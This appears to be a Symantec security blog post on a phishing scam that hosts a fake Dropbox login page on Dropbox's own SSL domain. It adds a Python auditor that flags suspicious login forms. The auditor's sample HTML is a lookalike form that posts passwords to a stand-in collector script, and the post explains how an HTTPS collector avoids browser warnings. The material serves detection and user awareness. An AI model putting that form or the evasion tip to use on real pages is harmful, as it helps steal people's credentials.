In March 2014, we blogged about how Google Docs and Google Drive users were being targeted by a sophisticated phishing scam. In this scam, messages included links to a fake Google Docs login page hosted on Google itself.
We continue to see millions of phishing messages every day, and recently we saw a similar scam targeting Dropbox users. The scam uses an email (with the subject "important") claiming that the recipient has been sent a document that is too big to be sent by email, or cannot be sent by email for security reasons. Instead, the email claims, the document can be viewed by clicking on the link included in the message. However, the link opens a fake Dropbox login page, hosted on Dropbox itself.
Figure 1. Fake Dropbox login page
The fake login page is hosted on Dropbox's user content domain (the same domain that serves shared photos and other files) and is served over SSL. That combination makes the attack more dangerous and convincing: the browser shows a padlock and a genuine Dropbox-owned hostname, so the usual advice to "check the address bar" does not expose the scam.
The page looks like the real Dropbox login page, but with one crucial difference. The scammers are interested in phishing for more than just Dropbox credentials; they have also included logos of popular Web-based email services, suggesting that users can log in using these credentials as well.
After the user clicks "Sign in," the form posts the credentials to a PHP script on a compromised Web server. That endpoint is also reached over SSL, and this detail is critical to the attack's effectiveness: a form on an HTTPS page that submits to a plain-HTTP URL triggers a browser warning about sending information over an unencrypted connection, and that unnerving dialog would likely stop many victims from proceeding.
Figure 2. Security warning
After saving the credentials or emailing them to the scammer, the PHP script simply redirects the user to the real Dropbox login page, so the victim is unlikely to notice that anything went wrong.
Although the page itself is served over SSL and the credentials are submitted over SSL, some resources on the page (such as images or style sheets) are loaded over plain HTTP. Recent versions of some browsers flag this mixed content, but the prominence of the warning varies from browser to browser: some simply change the padlock symbol shown in the address bar, whereas others add a small banner at the top of the page. Users may not notice these warnings or understand what they imply, so mixed content is a weak deterrent for victims, although it is a useful signal for anyone analyzing the page.
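The two signals described above (a login form on one host that posts passwords to a different host, and HTTP resources or form targets on an HTTPS page) are easy to check mechanically. The following Python script is an added example written for this article, not code from the original post or from Symantec; it audits a single HTML page with the standard library only. The page URL, the hostnames and the sample HTML are all constructed for illustration and do not correspond to the actual phishing page.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class LoginPageAuditor(HTMLParser):
    """Collect forms (with their action URL and whether they contain a password
    field) and the URLs of images, stylesheets and scripts from one HTML page."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []        # each entry: {"action": absolute_url, "has_password": bool}
        self.resources = []    # absolute URLs of sub-resources the browser would fetch
        self._current_form = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            # An empty/missing action means the form posts back to the page itself.
            self._current_form = {"action": urljoin(self.page_url, a.get("action", "")),
                                  "has_password": False}
            self.forms.append(self._current_form)
        elif tag == "input" and self._current_form is not None:
            if a.get("type", "").lower() == "password":
                self._current_form["has_password"] = True
        elif tag in ("img", "script") and a.get("src"):
            self.resources.append(urljoin(self.page_url, a["src"]))
        elif tag == "link" and a.get("href") and "stylesheet" in a.get("rel", "").lower().split():
            self.resources.append(urljoin(self.page_url, a["href"]))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current_form = None


def audit_login_page(page_url, html):
    """Return the three findings a phishing analyst would look for on a login page."""
    parser = LoginPageAuditor(page_url)
    parser.feed(html)
    page = urlsplit(page_url)
    findings = {
        "cross_origin_password_post": [],   # password form whose action host differs from the page host
        "insecure_form_submission": [],     # HTTPS page posting a password to an http:// URL
        "mixed_content": [],                # HTTPS page loading img/css/script over http://
    }
    for form in parser.forms:
        if not form["has_password"]:
            continue
        target = urlsplit(form["action"])
        if target.hostname != page.hostname:
            findings["cross_origin_password_post"].append(form["action"])
        if page.scheme == "https" and target.scheme == "http":
            findings["insecure_form_submission"].append(form["action"])
    if page.scheme == "https":
        findings["mixed_content"] = [u for u in parser.resources if urlsplit(u).scheme == "http"]
    return findings


# Constructed sample: a lookalike login page on a file-hosting "user content" host
# (hypothetical hostname) that posts credentials to a third-party PHP script.
PAGE_URL = "https://usercontent.example-hosting.net/u/1234/login.html"
SAMPLE_HTML = """
<html><head>
<link rel="stylesheet" href="http://cdn.example.com/lookalike.css">
</head><body>
<img src="http://cdn.example.com/logo-webmail.png">
<img src="/static/logo.png">
<form method="post" action="https://compromised-site.example/php/collect.php">
  <input type="text" name="email">
  <input type="password" name="password">
  <input type="submit" value="Sign in">
</form>
<form method="get" action="/search"><input type="text" name="q"></form>
</body></html>
"""


def audit_sample():
    return audit_login_page(PAGE_URL, SAMPLE_HTML)


if __name__ == "__main__":
    for kind, urls in audit_sample().items():
        print(kind, urls)
```

On the sample page the password form is reported as a cross-origin post to `compromised-site.example` and the two `http://` resources as mixed content, while the insecure-submission list stays empty because the collector is reached over HTTPS; swap the form action to `http://` and the third list fills in, which is exactly the warning the scammers avoided by serving their PHP endpoint over SSL. The search form is ignored because it carries no password field.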
Symantec reported this phishing page to Dropbox, which immediately took the page down. Any Dropbox-hosted phishing pages can be reported to Dropbox's abuse-reporting email address.
Symantec Email Security.cloud as well as Symantec Messaging Gateway and Symantec Messaging Gateway for Service Providers customers were protected from this threat.